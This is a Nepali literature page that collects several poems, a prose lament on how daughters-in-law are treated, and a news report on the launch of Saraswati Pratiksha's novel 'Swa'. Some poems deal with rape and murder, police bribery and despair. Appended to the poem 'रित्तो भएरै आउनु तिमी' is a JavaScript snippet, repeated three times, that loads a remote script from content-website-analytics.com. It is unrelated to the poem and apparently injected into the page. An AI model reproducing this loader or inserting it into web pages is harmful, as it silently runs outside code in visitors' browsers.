Category: साहित्य

साहित्य

  • रहर भरिएको शहर

    रहर भरिएको शहर

    गाउँको बस्ती टुङ्गीसक्यो
    भरियो नि शहर
    बालक युवा वृद्ध सबैलाई
    शहर बस्ने रहर

    जताततै भिडैभिड बस-ट्रकको घुईचो
    गाउँमा जस्तो चल्दैन यहाँ अर्म पर्म पैचो
    तरपनी मान्छेलाई यहि बस्ने रहर
    चट्टै गाउँलाई बिर्साईदिने कस्तो रैछ शहर

    गल्ली पिच्छे अग्ला अग्ला पाँचतले घर छन्
    दु:ख पर्दा हेर्दैनन् कै नदेखे झै गर्छन्
    तर पनि किन सबैलाई यहि बस्ने रहर
    गाउँको घरलाई बिर्साईदिने कस्तो रैछ शहर

    गाडी चढी जानै पर्ने पाँच मिनेट कै बाटो
    चढ्नै पर्ने बाध्यता छ खुट्टा तान्नु साटो
    तर पनि किन सबैलाई यहि बस्ने रहर
    गाउँको बाटो बिर्साईदिने कस्तो रैछ शहर

    पलटिङ्ग गरिसके भाको जग्गा जति
    बाहिरबाट मगाई खान्छन् गर्दैनन् खेतीपाती
    तर पनि किन सबैलाई यहि बस्ने रहर
    गाउँको खाना बिर्सादिने कस्तो रैछ शहर

    बनेका छन् उद्योग धन्दा घरै नजिक आडमा
    महँगिले आकाश छुन्छ दशै तिहार चाडमा
    तर पनि किन सबैलाई यहि बस्ने रहर
    गाउँको माया बिर्साईदिने कस्तो रैछ शहर

    ओल्लो घरमा थाहा हुन्न कै पल्लो घरमा पर्दा
    परे मलामी एक्लै जान्छन् घरमा कोहि मर्दा
    तर पनि किन सबैलाई यहि बस्ने रहर
    गाउँको सहयोग बिर्साईदिने कस्तो रैछ शहर

    बोडिङ्ग स्कुल पनि यहाँ गर्छन् प्रतिस्पर्धा
    अग्रिम भुक्तान नगरी हुन्न भर्ना फर्मलाई भर्दा
    तर पनी किन सबैलाई यहि बस्ने रहर
    गाउँको स्कुल बिर्साईदिने कस्तो रैछ शहर

    औकातले तौलिन्छ्न यहाँ मिल्ने साथी मनको
    गरिबलाई त गन्दैनन् कोहि फुर्ति लाउछन्
    धनको तर पनि किन सबैलाई यहि बस्ने रहर
    गाउँको साथी बिर्साईदिने कस्तो रैछ शहर

    जागीर पनि पाइन्न कतै भएपनि दक्ष
    आफना मान्छे घुसाईदिन्छ्न् लिन्छन् उनकै पक्ष
    तर पनि किन सबैलाई यहि बस्ने रहर
    गाउँको बस्ती बिर्साईदिने कस्तो रैछ शहर

    धुलैधुलो पदूषणले जेल्यो जताततै
    आधुनिक जमाना भन्छन् संस्कार छैन कतै
    तरपनि किन सबैलाई यहि बस्ने रहर
    गाउँको बसाई बिर्साईदिने कस्तो रैछ शहर
    गाउँको शेरो बिर्साईदिने कस्तो रैछ शहर

    – सुसिला पराजुली
    बुटवल -रुपन्देही

  • बुहारी र छोरीबीच भिन्नता !

    बुहारी र छोरीबीच भिन्नता !

    छोरी हुन निकै सजिलो रहिछ बुहारी हुन गारो।
    छोरी हुँदा बोलेका सबै शब्द प्यारो अनि बुहारी हुँदा त्यही व्यवहार गर्दा मातेकी, संस्कारहीन जस्ता नाना थरी शब्दको झटारो।

    छोरी हुँदा त्यही घरको लक्ष्मी भन्दै पूजा गरिने
    बुहारी हुँदा मानो सकिँदा अलक्षीना घरमा कष्ट पर्दा पिरुवा भन्दै सरापिने किन हो ?
    घर सल्लाहमा सामेल हुने छोरी,
    बुहारी भइसकेपछि भित्ताको पनि कान हुन्छ है
    भन्दै उ देखी लुकाउन पर्नु किन?
    घरमा झगडा पर्दा आवाज उठाउने छोरी,
    आज श्रीमानको पिटाइ खाँदा कुरा दबाउन पर्ने किन ?
    छोरी हुँदा पढाइ नै सबै थोक हो भन्दै हिँडेकी, बुहारी भइसकेपछि दाईजोको लागी ज्यान गुमाउन बाध्य हुनुपर्ने किन?

    मेरी आमालाई बद्लिएको देखेकी छु,
    मलाई अन्माई भाउजुलाई जब भित्र्याइन
    ५ बजे उठेर काम सक्ने मेरी आमालाई आजकल ढिलो सुस्त गरेको देखेकी छु।
    मेरा साना तिना गल्तीलाई भुली माफ गर्ने मेरी आमाले भाउजूमाथि लाञ्छना लगाउन थालेको देखेको छु। मलाई संस्कारको पाठ पढाउने मेरी आमाले भाउजुको संस्कारमाथि किन औंला ठड्याउन थालेकी छन्?
    मैले १ गिलास मात्र माझ्दा दुनियाँलाई सुनाउँदै हिँड्ने मेरी आमाले भाउजुले जति काम गर्दा पनि केही नगरेको भन्दै कुरा काट्दै हिँड्न थालीकी छिन् किन हो ?

    मलाई त अचम्म लाग्यो, जब म र भाउजु बिचको भिन्नता देखे, म बिरामी हुँदा मेरो स्याहार गर्ने मेरी आमाले भाउजु बिरामी भएर ओछ्यान परेकी देख्दा पनि नातकै हो भनेर मुख फुल्लाउदै बसेको देखे ।
    मेरो मनको पीडा सुनाउँदा नआत्ते, सबै ठीक हुन्छ, त्यस्तै हो सबैके भन्दै सम्झाउने मेरी आमाले आज मसँग भाउजुको कुरा काट्न थालीछिन्।

    ज्वाई घर आउँदा खुसीले गदगद हुने मेरी आमा, दाइले १ आखार ससुराली फोन गरे भन्नासाथ रिसाउन लाकीछिन् ।
    मेरी आमा आजकल निकै फेरेकी छन्।
    छोरी हुँदा गरेको कामलाई सराहुने मेरी आमा आज बिना कारण गाल फुलाउँदै, बङ्गार बजाउँदै बुहारीको गुनगान गाउन थालेकी छन्।
    अन्ततः छोरी र बुहारीमा किन यति धेरै फरक देख्छिन् मेरी आमा? हुन त बुहारी पनि मानिस नै हो, उसको पनि मन दुख्छ नै होला।

    भन्छन् छोरी पाउने भाग्यमानी हुन्छन्, तर छोरी मात्र होइन असल बुहारी पाउने भाग्यमानी हुन्छन्॥
    छोरीले आफ्नो कर्तव्य पूरा गर्ने हो भने बुहारीले आफ्नो नेतृत्व। घर सजाउने र भत्काउने भनेकै बुहारी हो।

    तब मन मेरो पोल्यो जब दाइको मुखबाट तेरो भनेर भाउजुको बाआमा र मेरो भनेर आफ्नालाई छुट्यायो। अन्ततः दुबैका लागि दुबै बराबर त थिए, दुबैलाई जन्म तिनै बाआमाले त दिए। फरक यति भो कि भाउजुको बाआमा बलियो थिए, मुटु चुटाएर पठाए, मेरो दाईको कमजोर थिए, १ नारी लिन १०० जना मानिस बोडी गार्ड बनाएर लगे।

    हेर्ने नजर बदलौं, सबै राम्रो देखिन्छ। २ आँखा आवश्यक भए जस्तै छोरी र बुहारी त्यतिकै महत्त्वपूर्ण छ।
    मेरी आमालाई अब मभन्दा नि भाउजुको खाँचो छ भनेर कसरी सम्झाउँ ? कतै आमाको यही व्यवहारले भोली दाइसँग मेरो सम्बन्ध बिग्रने हो कि भनेर कसरी सुनाउँ ?
    हल्ला सुन्दै छु, कान पनि फुक्न लागेकी छन् रे। झुटा आँसु देखाई हिजो दुईजना बीच झगडा पनि पारिदिछिन् रे।
    ए आमा, तिमी कति अबुज भएकी, तिम्रो मुर्खताले किन घर भाँड्न लागेकी?
    भन्छन् कर्म फर्किन्छ रे, कतै तिम्ले मेरो सुन्दर घर पनि बिगार्न खोजेकी?
    मेरी आमा सोझी छिन् जस्तो लाग्थ्यो, बुहारी भित्र्याएपछि तिनी भित्रको सासु पन किन जागो?

    – ईरा आर्याल

     

  • मेरै सफलताले पछि आँखा रसाउँछ

    मेरै सफलताले पछि आँखा रसाउँछ

    बिर्सिएर मनले किन चित्त दुखाउँछ
    सूर्य अस्ताएपछि फेरि चन्द्र उदाउँछ

    चिसो मुटू बन्दैमा पनि के हुनु दुःखी
    चिसो हिउँले, ढुङ्गो हिमाल बनाउँछ

    दुःख र पीर भन्नु नङ हो जिन्दगीको
    जति पटक फालेपनी फेरि पलाउँछ

    सबैभन्दा नरम चिज भनेर के गर्नु
    काँडा भन्दा बढी त जिब्रो बिझाउँछ

    मेरो वियोगमा रावण हाँसो हाँस्नेको
    मेरै सफलताले पछि आँखा रसाउँछ

    -कपिल अगस्त्य

  • पहिलो प्रेम नभएपनि अन्तिम प्रेम हुनु

    पहिलो प्रेम नभएपनि अन्तिम प्रेम हुनु

    मैले सधैँ प्रेमलाई मजाक मै लिएको थिए तर तिमीसँग बोल्दा हाँस्दा प्रेमको परिभाषा बुझे।
    मन मिल्ने नै त प्रेम होइन र माया।
    कसैसँग आफ्नो पुरै जीवन सम्पन्न गर्नु त्यो नै प्रेम होइन र माया ।

    तिम्रो अनुहार हेर्दा मेरो हरेक दुःख‌ सुखमा परिवर्तन हुन्छ त्यही त प्रेम होइन र माया ।
    मैले आफ्नो जीवनमा धेरै केटी साथीहरूसँग मिले,
    तर तिमी त्यो अरुभन्दा फरक निक्ल्यो,
    तिम्रो बोलीवचन आँखामा डुब्न चाहन्छु तिमी मेरो र म तिम्रो हुन चाहेको छु ।
    यदि तिमीलाई दुःख भयो भने त्यो दुःखको साथी बन्न पाउ ।

    तिमी घरको ठूलो छोरी म घरको ठूलो छोरा कुरै मिलेन
    तिमी अर्को जात म अर्को जात कुरै मिलेन
    तिमी पहाडमा बस्ने म तराईमा बस्ने कुरै मिलेन
    तिमी उचाइमा सानो म उचाइमा ठूलो कुरै मिलेन
    तिमी पढाइमा प्रतिभा म पढाइमा कमजोर कुरै मिलेन
    यदि भाग्यमा तिमी छौ भने तिमीलाई मेरो आमाको छोरी बनाउन चाहन्छु।

    यदि अहिले मेरो प्रेम एकतर्फ भएपनि निश्चित एकदिन मैले आफ्नो मनको कुरा भन्नेछु तिमीलाई माया ।

    – रोहित कुमार शाह

  • सुरक्षित छैनन् छोरी

    सुरक्षित छैनन् छोरी

    स्कुलबाट पढाइ सकि आउदै थीए टोलाउदै
    मनैभरी भबिस्यको सपनाहरु सजाउदै

    सबै साथी बिदा भैइ घर घर गए
    अब आधी बाटो थियोे म त एक्लै भए

    फ्याट् फुट्ट घर बनेका थिए कताकती
    जङ्गलको बाटो थियो पन्द्र मिनेट जति

    पाइला मैले चालिराथे थियो तिब्र गती
    के गर्नु खै हिंड्नै पर्थेयो गर्नलाई प्रगति

    त्यतिकैमा एउटा मान्छे यतै आको देखे
    नाक मुख छोप्या थियो पहिलो पटक भेटे

    कहाँ जानी हो नानी तिमी भन्दै सोध्न लाग्यो
    छिटो छिटो हिंड्न खोजे बाटो छेक्न लायो ।

    आफ्नो बाटो अघि बढन मैले कोसिस गरे
    प्रयास मेरो खेर गयो उसको फन्दा परे

    जबर्जस्ती गर्न लाग्यो थाले चिच्याउन
    फुल जस्तो जोबन मेरो लुट्यो एकैछिनमा

    छोड्दिनु न छोड्दिनु न भन्दै परे सरन
    गुहार गुहार भन्दा भन्दै गयो मेरो परान

    उता मेरि आमा मलाई कुर्दै बसेकी थिन
    छोरी आएपछि खानी भन्दै नास्ता साचेकी थिन

    मेरो खुट्टा हिडिराथे घर पुग्ने आसमा
    त्यो दिन त ग्रहण लायो चम्किलो प्रकाशमा

    यता म त छ्ट्पटाथे गएपनि सास
    आत्मा मेरो जिउँदै थियो भएपनि लास

    त्यै बेलामा टुप्लुक्क मान्छे आयो अर्को
    खासै मेसो पाइन मैले थियो कुनै घरको

    मोरेको त्यो लासमा पनि गलत नजर लाउदै
    मुसु मुसु हासिराथ्यो नजिक नजिक आउदै

    सबै कुरा थाहा पायो खबर गर्यो गाउँमा
    पुलिस लाई नि खबर दियो उसले ठाँउ ठाँउमा

    सबै मान्छे भेला भए
    पुलिस पनि आए
    आइडी कार्डमा नम्बर थियो घरमा खबर दिए ।

    यो सुनेसी मेरि आमा पिडाले गलिन
    सहन तिन्ले सकिन् नि बेहोस भइ ढलिन

    हतारिदै चिच्याई काम्दै बाबा पुगे त्यही
    निसासिए मलाइ देख्दा सकेनन् बोल्न केही

    छानबिन गर्दै थिए पुलिस घटना भयो क्यारी
    हाम्ले पत्ता लाउछ्म् भन्थे बाबातिर हेरि

    गल्ती गर्ने अपराधीको रैछ पुलिस मित्र
    आखै आखा सेटिङ मिलाए यिन्ले भित्र भित्र

    लाखै लाखको बिटो पाए दोषी लुकाईदिए
    कोही दोषी छैन भनी लासलाई बुझाईदिए

    लाखले मुख बन्द भाको कहाँ आँसु बिक्थ्यो
    बाबा अरु के चान्थे र न्याय दिए पुग्थ्यो

    कति सपना थिए मेरा भए माटो बिलिन
    बुढेसकालको साहारा भन्थिन आमा कति रोलिन

    प्रतिमा र निर्मलाले भोगे मैले जस्तै
    यस्तै पिडा भोग्ने छोरी अरुनि छन् मस्तै

    कहिँ कतै सुरक्षित छैन छोरिलाई
    अब यस्तै पिडा भोग्न नपरोस् अरुलाई

    कडा खालको नियम चाहियो फाँसी दिनै पर्छ
    फाँसी दिने नियम आएमा यस्ता घटना घट्छ ।

    – सुसिला पराजुली
    बुटवल

  • जीवनको संग्राम

    जीवनको संग्राम

    म थाकी सके यो जिन्दगीबाट,
    म हारी सके बारम्बार।
    अरुलाई रिजाउँदा म दिक्क परे,
    मलाई स्वतन्त्र भै हिड्नु मन छ,
    मलाई एकान्तमा जिउनु मन पर्छ।

    अँध्यारोबाट डराउने म,
    आज त्यही अँध्यारोमा रमाउन थालेकी छु।
    चराको चिरविरसँगै मोहित हुने यो मेरो मन,
    अहिले त्यही चिरविर सुन्दा ओक्का दिक्क पर्न थालेको छ।

    थाहा छैन मलाई के गर्दै छु,
    के म सही छु या गलत,
    म आफैँ दोधारमा परेकी छु।
    रङ्गीन थियो मेरो जिन्दगी,
    हरीयाली थिए मेरा सपना,
    सबै रङ्ग भङ्गन भइ,
    अन्धकारको बादलले घेरेको छ मेरो जिन्दगी।

    विन अर्थ यो आँखाबाट झरी पर्छ,
    किन हो किन यो मनमा कालो बादल लागे जस्तो हुन्छ।
    कस्लाई सुनाउँ म मेरो मन गर्जिएको,
    पटक पटक यो आत्मा टुक्रा टुक्रा परेको।

    आँसु बेच्न मिल्ने भए,
    म पनि बेच्थे होला,
    त्यही पैसाले मेरो लागि खुशी किन्थे होला।
    यदि भाग्य लेख्ने कलम भएको भए,
    कस्तो हुन्थ्यो होला है,
    कसैलाई पनि एकान्तमा पसी रुनु पर्थेन होला।

    संसार चल्दै छ, सबैको आफ्नै पीडा र वेदनाले,
    सबैलाई पीडा आफ्नै ठूलो लाग्छ,
    खै यो पनि त रिसले होला है।
    खुशी बारम्बार खोसिए,
    ईच्छा मर्दै गए,
    अब बाँकी यही खोक्रो शरीर छ,
    त्यो पनि अझ भोलि गल्दै गइरहेको छ।

    मन चञ्चल थियो, अहिले स्थिर छ,
    जीवन बिना गतिमा बग्दै छ।
    कहिले कहाँ पुगी ठेस खान्छ,
    त कहिले कहाँ पुगी बजारीन्छ।

    कथा मेरो यस्तै छ,
    विन कारण यो मन पोली रन्छ।
    बिन अर्थ यो मन रोहिरन्छ।

    – ईरा आर्याल

  • म पहिचानहिन प्राणी

    म पहिचानहिन प्राणी

    म एक पहिचान हिन प्राणी हूँ
    कोख, नाता र जमिनले
    मलाई हरेक सम्बन्धमा बसाइदियो
    तर म केही बन्न सकिन ।
    मलाई जन्माएर- हुर्काएर आमाले आफ्नो कर्तव्यले मलाई छोरो बनाइन्,
    मलाई नागरिकता दिएर राष्ट्रले नागरिक बनायो ,
    मैले कसैको शिर सजाउँदा म श्रीमान भए ,
    प्रेमील स्पर्श बाट म बाउ भए, दिदीलाई विदाई गरेपछि म मामा भए,
    अवश्य पनि म हरेक नाता हरुले बाँधिए तर म कर्तव्यले केही बन्न सकिन ।
    आमा ! मैले तोते बोलिमा भनेको “म सधैं तिमिलाई स्हारेर तिम्रो सहरा बन्छु । “झुट बनिदिए
    त्यो तोते बोलिमा झुट थिएन आमा तर जिम्मेवारी बुझ्दै जाँदा झुट बनिदियो ।

    मैले मेरी उनकी आमासँग सुखदुःखमा सधैं साथ दिन्छु भनेर बाचा गरेर ल्याएको थिए
    तर साथस्वरुप केबल आश्वासन् दिन सक्छु
    परिस्थितिले त्यो बाचा पनि झुट बनाइदियो।

    छोराले बाउ भनेर केबल तस्बिरले चिन्यो काखमा खेल्न पाएन,
    म उसको लागी घोडा बन्न सकिन,
    मेरो घुँडा उसको लागि ढयाकुस् बन्न सकेन ,
    उसले मेरो काँध चडेर आकाश छुन बल गर्न पाएन,
    न त भान्जालाई काँध चढाएर गाउँ डुलाउन पाए
    मिठाई किनिदिएर खुवाउन पाइन
    म कर्तव्यले केही बन्न सकिन ।

    गरिबीले मुटुको भित्री भागमा पहिरो खसेपछि म सुटकेस घिसार्न बाध्य भए
    गरिबीलाई मेटाउँदै गर्दा म केबल पैसाको श्रोत भए तर कर्तव्यले केही बन्न सकिन ।

    सानोमा पढ्दै गर्दा मैले गुरुलाई मेरो देशको गौरव बन्ने छु म कहाँ अन्त फुल्ने छु भनि भन्दा गुरु मुसुक्क मुस्कुराउनु भएको सम्झन्छु,
    आज त्यो मुस्कानले खुब मुटु पोल्छ
    त्यो अन्योल मुस्कान आफूले भोगेको स्थिती सम्झेर थियो कि मेरो खोक्रो आँट देखेर थियो कुन्नि मैले अझै बुझिन !

    तर यति बुझें, देशमा पढ्ने केबल सर्टिफिकेट निकाल्न रहेछ अनि नागरिकता पासपोर्ट बनाउन
    माफ गर मेरी आमा म कर्तव्यले छोरा बन्न सकिन
    माफ गर पियारी म कर्तव्यले श्रीमान बन्न सकिन
    माफ गर छोरो म कर्तव्यले बाउ बन्न सकिन
    म कर्तव्यले केही बन्न सकिन ।

  • रित्तो भएरै आउनु तिमी

    रित्तो भएरै आउनु तिमी

    चियादानिमैँ चियापत्ती अल्झिँरहदा पनि,
    जुन रसले भरिएर,
    चियापत्ती अझैँ भिजिरहन्छ,
    जुन रसले भरिएर,
    चियापत्ती अझैँ पनि चिसिईरहन्छ
    अलि अलि गर्दै,
    चियापत्ती’ले तरलमा रँग
    पोखिईरहन्छ,
    पोखिईरहन्छ,
    रङ्ग पोखिँदा पोखिँदै,
    अन्ततः रित्तो भैँसकेपछि
    अब दिनलाई ऊ’सँग जुन कुरा बाँकी रहन्छ,

    “बाँकी नरहेको कुरामा
    जुन कुरा दिनलाई बाँकी रहन्छ ”
    त्यहि नै हो ‘प्रेम’

    बगर छोडेर,
    नदी सागरमा मिसिन आएझैं
    आउनु तिमी मेरा लागी पनि,
    आफुसँग केही कुरा बाँकी नराखी,
    मसँग मसँगै,
    बाकी हुन आउनु तिमी मेरा लागि,
    रित्तो भएरै आउनु तिमी मेरा लागि,
    खाली, खाली म’ तिमीभित्र भरिने छु ।

    रित्तो मौन आकाशले सागरलाई भर्न,
    अँगालोभरी पानी अटाँएर राखे जसरी,
    रित्तो मैले’ तिमीलाई भर्न,
    एक अङ्गालो माया अटाएर राखेको छु
    आउनु,
    तिमी मेरा लागी आउनु,
    आफुसँग केही कुरा बाँकी नराखी,
    मसँग मसँगै,
    बाकी हुन आउनु तिमी मेरा लागि,
    रित्तो भएरै आउनु तिमी मेरा लागि,
    खाली, खाली म’ तिमीभित्र भरिने छु ।;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);

  • म झट्टै मरिहाले भने

    म झट्टै मरिहाले भने

    म झट्टै मरिहाले भने
    केही गरी कालको नजर मै माथि परी हाल्यो भने
    के हुन्छ होला म झट्टै मरिहाले भने!

    म संसार हेर्न सक्छु होला या सक्दिन होला?
    मरेको मान्छे बोलेको त कसले सुन्छ र ?
    छुटेपछि शरीर आत्मबाट म बोल्न सक्छु होला या सक्दिन होला ?
    महसुस सकिएको आँखाले फेरि यो सृष्टि नियाल्न सक्छु होला या सक्दिन होला ?
    का पुगुला छोडेर म आफ्नो शरीर म बतास हुन्छ होला या झरी ?

    मेरो कान सम्म आफ्ना चिच्याहट पुग्ला की नपुग्ला ?
    मेरो रोकिएको ढुकढुकीले फेरि त्यो अन्तिम प्रेम बुझ्ला की नबुझ्ला?
    कसैले झकझाकाउँदा मेरो शरीर म पर बसेर हेरिरहेको हुन्छ होला कि धेरै पर पुगिसकेको हुन्छु होला ?

    सास र शरीर छुटेपछि म बिहान साँझ छुट्याउन सकुला या नसकुँला?
    यहाँका साथी अनि इस्टमित्रको सम्झनाले सताउला की नसताउला?
    एउटै प्रश्न
    के हुन्छ होला म झट्टै मरिहाले भने ?

  • सरस्वती प्रतीक्षाको उपन्यास ‘स्व’ बजारमा

    सरस्वती प्रतीक्षाको उपन्यास ‘स्व’ बजारमा

    काठमाडौं । साहित्यकार सरस्वती प्रतीक्षाको उपन्यास ‘स्व’ लोकार्पण भएको छ । शनिबार काठमाडौंमा आयोजित कार्यक्रममा साहित्यकार प्रतीक्षासँगै लेखक एवम् पत्रकार घनश्याम खड्का र लेखक सगुना शाहले लोकार्पण गरेका हुन् ।

    पुस्तकमाथि टिप्पणी गर्दै सगुना शाहले ‘स्व’ स्व-अस्तित्वको खोजको कथा भएको बताइन्, “जब सप्तमले आफूलाई चिन्नलाई कोसिस गर्छ, तब उसले त्यसलाई आफ्नो अस्तित्वसँग जोडेर त्यसैको खोजीमा लागेको छ ।”

    उपन्यासको मुख्य पात्र सप्तमबारे टिप्पणी गर्दै उनले थपिन्, “बौद्ध-दर्शन र त्यसको संवरणलाई सरस्वतीजीले सप्तममार्फत उतार्नुभएको छ । बहुरुपी सप्तमको यात्रा रोचक र चित्ताकर्षक छ । कलात्मक भाषा-शैली र कथावाचनले उपन्यास उच्चकोटीको बनेको छ ।” उपन्यासबारे बोल्दै अर्का वक्ता घनश्याम खड्काले मानिसका प्रयत्न खुशीको खोजी भएको र आफैंभित्रको यात्राबाट मात्रै त्यो सम्भव भएको बताए ।

    उनले भने, “त्यही यात्राको खोजका निम्ति सप्तमको मनोविज्ञानलाई चित्रांकन गर्दै सरस्वतीजीले सुन्दर उपन्यास सृजना गर्नुभएको छ । बौद्ध-दर्शनको मार्गमा पात्रको मनस्थितिलाई विभिन्न तहहरूमा बुन्दै यति सुन्दर उपन्यास लेख्नु जीवनभित्रको दर्शन पनि हो ।

    जीवनको फराकिलो फलकमा लेखिएको एक सुन्दर कृति नेपाली पाठकले पाएका छन् ।” सात वर्षको समयावधिमा उपन्यास लेखिसकेको र आफ्नो अध्ययन, अनुभव र ज्ञानलाई उपन्यासमा चित्रण गर्ने कोसिस गरेको लेखक सरस्वती प्रतीक्षाले बताइन्, “यसमा समाज छ, दर्शन छ र चिन्तन पनि छ ।

    शिल्पमा स्वेरकल्पनाको प्रयोग गरेकी छु ।” सात वर्षअघि प्रकाशित ‘नथिया’ उपन्यासबाट पाठक र समीक्षकको राम्रो प्रतिक्रिया पाएकी सरस्वती प्रतीक्षाको यो दोस्रो उपन्यास हो । बुकहिल पब्लिकेसनले प्रकाशन गरेको २९६ पृष्ठको ‘स्व’को मूल्य ५९९ रुपैयाँ रहेको छ ।